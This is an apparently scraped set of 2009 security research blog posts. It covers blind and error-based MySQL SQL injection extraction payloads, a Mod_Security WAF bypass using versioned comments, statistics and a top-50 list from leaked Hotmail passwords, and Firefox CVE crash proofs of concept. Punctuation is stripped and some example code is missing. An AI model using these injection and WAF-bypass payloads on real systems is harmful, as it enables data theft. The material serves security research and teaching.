output any data into the page returned by the web application Here is an example of vulnerable code in php containing a Blind SQL Injection vulnerability Capabilities of Blind SQL Injection are comparable with those of classical SQL Injection technique Just like the classical technique of exploitation, Blind SQL Injection exploitation allows one to write and read files and get data from tablea, only the entries are read symbol-by-symbol Standard blind exploitation is based on analysis of true false logical expression If the expression is true, then the web application will return a certain content, and if it is false, the application will return another content If we consider the difference of outputs for true and false statements in the query, we will be able to conduct symbol-by-symbol search for data in a table or a file Here is an example of vulnerability exploitation for the code given above id 1 and 555 if ord mid select pass from users limit 0,1 ,1,1 97,555,777 If the table users contains a column pass and the first symbol of the first entry from this column is 97 symbol a , then MySQL will return TRUE and the query will be true Otherwise, it will return FALSE and the page will display error for the code given above The described technique had been applied for a long time, but the situation has cardinally changed when Russian magazine issues X07'09 and X09'09 were published The information security investigator Qwazar described new approaches to Blind SQL Injection exploitation The first proposed technique consists in using incorrect regular expressions that cause various negative reactions of MySQL during execution of the select query in the course of SQL query execution, not at the stage of checking its syntax Qwazar demonstrated that this approach being composed with the method proposed by Elekt select 1 union select 2 allows one to find up to 12 characters using one query to the web application The attack query has the following form Thus, if the table users contains a column pass and the first symbol of the first entry from this column is 0, then MySQL will return an error message 1139 - Got error 'invalid repetition count s ' from regexp If the first symbol in the column pass is 1, then an error message 1139 - Got error 'braces not balanced' from regexp will be received, etc Another approach to speed up exploitation of Blind SQL Injections demonstrated by Qwazar X09'09 consists is using MySQL error messages as containers for useful data it is a real breakthrough in the field of Blind SQL Injection exploitation For example, the following query id 1 union select from select from select name_const select pass from users limit 1 , 14 d as t join select name_const select pass from users limit 1 , 14 e b a will return an error message containing useful data from the column pass eg an MD5 hash 1060 - Duplicate column name 'f8d80def69dc3ee86c5381219e4c5c80' With this method, one can get up to 64 bytes of useful data using one query to the web application Functions of string concatenation concat and concat_ws allow one to make an effective and quick dump of the whole table Unfortunately, the given ruse with the function name_const will give results only for MySQL versions 50125064 An idea to find a substitute for the function name_const was developed and another useful function ExtractValue that appeared in MySQL version 515 was discovered This function is meant for data extraction from an XML data flow However, it also has another pretty hacker application For example, the following query id 1 and ExtractValue 1,concat 0x5C, select pass from users limit 0,1 will return an error message XPATH syntax error ' f8d80def69dc3ee86c5381219e4c5c8' Thus, we can read data from the table using Blind SQL Injection exploitation MySQL v 515 and later and having a restriction of 31 useful bytes per one query to the web application The XPATH syntax error is related to incorrect regular expression Note when the article was published, Qwazar offered the more interesting method to exploit Blind SQL Injection to which all MySQL versions later than 41x are affected Unfortunately, all described methods can be applied only if MySQL error messages are placed into the body of the returned page, which isn't always true Well, what of that Do we have to use tedious techniques of symbol-by-symbol search again Not always One can often find an SQL Injection vulnerability in a numeric parameter of the web application web application will return different contents depending on the specified figure If we correlate these figures with the content and apply them onto the map of symbols being searched, then we will be able to read data from the table very effectively For example News title 111 identifier in the parameter id 3245 the symbol being searched is 0 News title 222 identifier in the parameter id 2456 the symbol being searched is 1 News title 333 identifier in the parameter id 4562 the symbol being searched is 2 etc Here is an example of attack query eg meant for accurate identification of the first symbol in an MD5 hash It should be mentioned that in this method, the length of HTTP request cannot be more than 8192 bytes In other respects, the method is rather effective when MySQL error messages are not displayed in the returned page In addition, the method is universal and doesn t depend on the database being used Proof of concept code is here Double Blind SQL Injection Sometimes not only all error messages are excluded from the page returned by the web application, but the vulnerable query itself is used only for certain internal purposes For example, it can serve for some event logging or internal optimization These SQL Injection vulnerabilities belong to the Double Blind class Exploitation of this group of SQL Injections is based on analysis of time delays from the moment of sending a query to the web application till the moment of receiving the answer from it In classical approach, the function benchmark is applied However, the function sleep represents a better and more secure alternative, because it doesn t use processor resources of server as the function benchmark does Here is an example of a simple implementation of symbol-by-symbol search based on analysis of time delays As one can see, alphabetical order is used in the array b_srt to find data The script sequentially checks every symbol from the array for coincidence with a symbol from the database One can speed up the process by arranging the symbols in a more favourable order or using a binary tree It should be mentioned that application of binary trees requires use of symbols and , which is not always possible, because these symbols are often converted to HTML equivalents As for favourable searching order, d0znp can be found in the Hacker in December 2009 the Russian magazine , and soon it can be found in white papers at milw0rmcom in English http://www.secuobs.com/revue/news/175550.shtmlhttp://www.secuobs.com/revue/news/175550.shtml Secuobs.com : 2009-11-05 14:57:27 - Positive Technologies Research Lab - There s again news that user account database is available in the Internet Now it is about Windows Live Mail users The origin says that more than 10000 passwords of Hotmail user accounts are in public access I could not miss it, and brief googling leads me to the true origin Now pastebincom server operates unstably but google cache works perfectly So, firstly, the list of published and sorted without repetitions accounts includes only accounts that start from letters a and b It means that the full list of users is much bigger than the published list If we assume that there are about 4000-5000 accounts for every English alphabet letter it s easy to calculate that the full list of compromised accounts could reach 150000 Secondly, only 9238 of 10028 published accounts are legitimate If we also consider Hotmail restriction policy that requires password length to be no less than 6 characters, only 8250 accounts are legitimate Here are the results for used charset for the whole password list This is the similar diagram, considering Hotmail password policy As you can see, the graphics are almost identical Comparing with similar data on corporate users 1 and user passwords from VKontakte social service 2 , the diagram is the following And this is a diagram by password lengths Assuming that the most part of Hotmail users are foreign Internet users, we can see the difference in how Russian and foreign users choose passwords Our nationals prefer numerals but foreign users prefer English alphabet characters in lower case On the other hand, Russian users choose longer passwords Here s TOP50 of the most widespread passwords for Hotmail user accounts 1 123456 2 123456789 3 alejandra 4 111111 5 alejandro 6 tequiero 7 12345678 8 1234567 9 alberto 10 daniel 11 000000 12 ESTRELLA 13 beatriz 14 roberto 15 sebastian 16 andrea 17 iloveyou 18 bonita 19 felicidad 20 555555 21 amigos 22 brujita 23 america 24 arturo 25 Princesa 26 666666 27 BETITO 28 mariposa 29 777777 30 ricardo 31 asdfgh 32 rosita 33 piscis 34 caballo 35 cristina 36 gatito 37 112233 38 angelica 39 junior 40 123123 41 barbara 42 libertad 43 adriana 44 angelito 45 carolina 46 654321 47 felipe 48 ximena 49 paloma 50 Esperanza If we analyze the list of the most widespread passwords in Hotmail accounts, we can see that very often user name is used as a password However, numeral combinations 123456, 1234567, 12345678 and 123456789 are in TOP10, as in used passwords statistics in Russian companies They are considered as leaders among the most favorite passwords for users all over the world IMAGE http://www.secuobs.com/revue/news/157741.shtmlhttp://www.secuobs.com/revue/news/157741.shtml Secuobs.com : 2009-11-05 14:57:27 - Positive Technologies Research Lab - A method that I discovered today in MySQL documentation struck me with its simplicity and the fact that I haven t noticed it before Let me describe this method of bypassing WAF MySQL servers allow one to use comments of the following type sql-code and 12345sql-code As can be noticed, SQL code will be executed from the comment in both cases The latter construction means that sql-code should be executed only if the DBMS version is later than the given value As I have been repeatedly asserted 1,2 , some WAFs skip comments during signature search Among such WAFs, there is the latest stable assembly of Mod_Security v 259 Here is a simple example query SELECT name FROM table where id GET id result mysql_query query If a web application is protected with Mod_Security, then the following request will be forbidden id 1 union select 1 It is remarkable that even these requests that are incorrect in the considered example will be also forbidden by the WAF HPP HPF techniques id 1 union id select table_name from information_schemacolumns id 1 union blabla1 select table_name blabla2 from information_schemacolumns But if we use the described method with comments, Mod_Security will allow our requests and we will be able to exploit an SQL Injection id 1 limit 0 union select concat_ws 0x3a,table_name,column_name from information_schemacolumns id 1 12345limit 0 union select concat_ws 0x3a,table_name,column_name from information_schemacolumns id 1 limit 0 union select concat_ws 0x3a,username,password,email from users Well, one more method to our arsenal - IMAGE http://www.secuobs.com/revue/news/157740.shtmlhttp://www.secuobs.com/revue/news/157740.shtml Secuobs.com : 2009-11-05 14:57:27 - Positive Technologies Research Lab - October 27, Mozilla developers fixed several vulnerabilities in the browser engine used in Firefox and other Mozilla-based products Vulnerabilities fixed in 3015 and 354 versions CVE reference CVE-2009-1563, CVE-2009-3370, CVE-2009-3371, CVE-2009-3372, CVE-2009-3373, CVE-2009-3374, CVE-2009-3375, CVE-2009-3376, CVE-2009-3377, CVE-2009-3378, CVE-2009-3379, CVE-2009-3380, CVE-2009-3381, CVE-2009-3382, CVE-2009-3383 Complete list of Proof-of-Concept codes crash triggers 1 CVE-2009-3382 CSS Frame Constructor layout base nsCSSFrameConstructorcpp in the browser engine does not properly handle first-letter frames PoC function doe2 i document getElementById 'a' setAttribute 'style' , 'display -moz-box ' document getElementById 'c' style display 'none' setTimeout doe2 , 500 , 0 div first - letter float right a m 2 CVE-2009-1563 Array indexing error in NSPR's Balloc leads to floating point memory vulnerability Secunia Research Details The s2b function takes the total number of digits and determines the first number K for which 1 numdigits 8 9 K is then passed to Balloc to allocate memory Balloc dereferences the static freelist buffer of 16 elements using K as an index If K is above 15, malformed pointers following the freelist array will be returned from Balloc 1 define Kmax 15 2 3 static Bigint freelist Kmax 1 4 5 Balloc k 6 7 if rv freelist k next 9 10 11 return rv For eg K 17, a pointer to a limited heap buffer is returned from Balloc , and used to hold the converted big number This results in a heap-based buffer overflow, followed by a call to a function grabbed from a corrupted pointer to a virtual function table This results in the execution of an arbitrary address when paired with heap spraying PoC 1 https bugzillamozillaorg attachmentcgi id 400490 PoC 2 Secunia https bugzillamozillaorg attachmentcgi id 400493 PoC 3 https bugzillamozillaorg attachmentcgi id 406726 3 CVE-2009-3375 Cross-origin data theft through documentgetSelection PoC Select destination for iframe and select 'go' Make a text selection and the content should be displayed in an alert box https bug503226bugzillamozillaorg attachmentcgi id 387576 4 CVE-2009-3378 Crash while loading ogg video The oggplay_data_handle_theora_frame function media liboggplay src liboggplay oggplay_datac in liboggplay attempts to reuse an earlier frame data structure upon encountering a decoding error for the first frame, which allows remote attackers to cause a denial of service NULL pointer dereference and application crash or possibly execute arbitrary code via a crafted ogg video file PoC https bugzillamozillaorg show_bugcgi id 500311 Crash PoC Video 5 CVE-2009-3371 Crash with recursive web-worker calls Use-after-free vulnerability allows remote attackers to cause a denial of service application crash or possibly execute arbitrary code by creating JavaScript web-workers recursively PoC https bugzillamozillaorg attachmentcgi id 398496 IMAGE http://www.secuobs.com/revue/news/157739.shtmlhttp://www.secuobs.com/revue/news/157739.shtml